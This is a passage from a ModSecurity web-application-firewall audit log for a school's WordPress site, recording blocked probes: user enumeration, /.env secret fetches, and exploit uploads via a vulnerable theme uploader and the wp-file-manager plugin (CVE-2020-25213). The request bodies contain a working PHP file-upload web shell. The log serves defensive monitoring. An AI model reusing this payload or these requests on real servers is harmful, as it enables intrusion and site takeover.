OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7707944-Z-- --1de20864-A-- [19/May/2025:00:25:34 +0700] aCoYDkPRqak7bVuUS6fEgQAAAJU 103.236.140.4 37298 103.236.140.4 8181 --1de20864-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 212.105.78.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 212.105.78.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1de20864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de20864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747589134399596 3493 (- - -) Stopwatch2: 1747589134399596 3493; combined=1468, p1=486, p2=951, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de20864-Z-- --ad185722-A-- [19/May/2025:00:50:50 +0700] aCod-hir-GlPrFVVKe7YnwAAAFc 103.236.140.4 37436 103.236.140.4 8181 --ad185722-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.241.254.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.241.254.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad185722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad185722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747590650931491 3314 (- - -) Stopwatch2: 1747590650931491 3314; combined=1441, p1=501, p2=909, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad185722-Z-- --f9150a67-A-- [19/May/2025:01:01:45 +0700] aCogiUPRqak7bVuUS6fEqAAAAJU 103.236.140.4 38108 103.236.140.4 8181 --f9150a67-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 143.244.168.161 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f9150a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9150a67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747591305196956 787 (- - -) Stopwatch2: 1747591305196956 787; combined=354, p1=306, p2=0, p3=0, p4=0, p5=48, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9150a67-Z-- --7a7f681a-A-- [19/May/2025:01:11:59 +0700] aCoi7xir-GlPrFVVKe7Y2AAAAEk 103.236.140.4 38308 103.236.140.4 8181 --7a7f681a-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --7a7f681a-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --7a7f681a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a7f681a-E-- --7a7f681a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [t Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747591919347062 1813 (- - -) Stopwatch2: 1747591919347062 1813; combined=747, p1=410, p2=310, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a7f681a-Z-- --d98e0e6e-A-- [19/May/2025:01:12:07 +0700] aCoi91ewLfDrCkDGIGz0rgAAAMc 103.236.140.4 38352 103.236.140.4 8181 --d98e0e6e-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=6a54ae8c6d6da1882e5560e3f1025b2e --d98e0e6e-C-- --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="cmd" upload --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="target" l1_Lw --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --6a54ae8c6d6da1882e5560e3f1025b2e-- --d98e0e6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d98e0e6e-E-- --d98e0e6e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747591927047950 3308 (- - -) Stopwatch2: 1747591927047950 3308; combined=2127, p1=415, p2=1681, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d98e0e6e-Z-- --6a359263-A-- [19/May/2025:01:14:15 +0700] aCojdxir-GlPrFVVKe7ZjQAAAFA 103.236.140.4 39102 103.236.140.4 8181 --6a359263-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --6a359263-C-- =TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --6a359263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a359263-E-- --6a359263-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic" Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592055079840 1962 (- - -) Stopwatch2: 1747592055079840 1962; combined=790, p1=462, p2=299, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a359263-Z-- --5cd8d867-A-- [19/May/2025:01:14:30 +0700] aCojhvypzAd0elWOk7rlVgAAAAA 103.236.140.4 39344 103.236.140.4 8181 --5cd8d867-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --5cd8d867-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --5cd8d867-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd8d867-E-- --5cd8d867-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF" Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592070367214 2017 (- - -) Stopwatch2: 1747592070367214 2017; combined=688, p1=442, p2=220, p3=0, p4=0, p5=26, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd8d867-Z-- --f58f1d5c-A-- [19/May/2025:01:14:37 +0700] aCojjfypzAd0elWOk7rlYwAAABg 103.236.140.4 39462 103.236.140.4 8181 --f58f1d5c-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=5150b503abb7b0bcdc8b33c7c6e1d8e6 --f58f1d5c-C-- --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="cmd" upload --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="target" l1_Lw --5150b503abb7b0bcdc8b33c7c6e1d8e6 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --5150b503abb7b0bcdc8b33c7c6e1d8e6-- --f58f1d5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f58f1d5c-E-- --f58f1d5c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||www.smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592077496497 3881 (- - -) Stopwatch2: 1747592077496497 3881; combined=2743, p1=507, p2=2204, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f58f1d5c-Z-- --eb630865-A-- [19/May/2025:01:29:32 +0700] aConDBir-GlPrFVVKe7aMgAAAEU 103.236.140.4 39940 103.236.140.4 8181 --eb630865-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --eb630865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb630865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747592972400567 924 (- - -) Stopwatch2: 1747592972400567 924; combined=345, p1=302, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb630865-Z-- --dedfe96c-A-- [19/May/2025:01:46:09 +0700] aCoq8fypzAd0elWOk7rlkAAAABA 103.236.140.4 40018 103.236.140.4 8181 --dedfe96c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.164.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.164.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dedfe96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dedfe96c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747593969220752 3388 (- - -) Stopwatch2: 1747593969220752 3388; combined=1480, p1=515, p2=922, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dedfe96c-Z-- --365a3113-A-- [19/May/2025:01:54:24 +0700] aCos4Bir-GlPrFVVKe7aRwAAAFI 103.236.140.4 40334 103.236.140.4 8181 --365a3113-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.135.71.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --365a3113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --365a3113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747594464450640 2309 (- - -) Stopwatch2: 1747594464450640 2309; combined=1215, p1=405, p2=782, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --365a3113-Z-- --e165aa48-A-- [19/May/2025:02:03:12 +0700] aCou8Bir-GlPrFVVKe7aUgAAAEY 103.236.140.4 40508 103.236.140.4 8181 --e165aa48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.152.106.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.152.106.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e165aa48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e165aa48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747594992596711 3547 (- - -) Stopwatch2: 1747594992596711 3547; combined=1514, p1=514, p2=960, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e165aa48-Z-- --45f17111-A-- [19/May/2025:02:07:07 +0700] aCov2xir-GlPrFVVKe7aVwAAAE8 103.236.140.4 40526 103.236.140.4 8181 --45f17111-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.165.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.165.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --45f17111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45f17111-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747595227431007 3310 (- - -) Stopwatch2: 1747595227431007 3310; combined=1442, p1=501, p2=909, p3=0, p4=0, 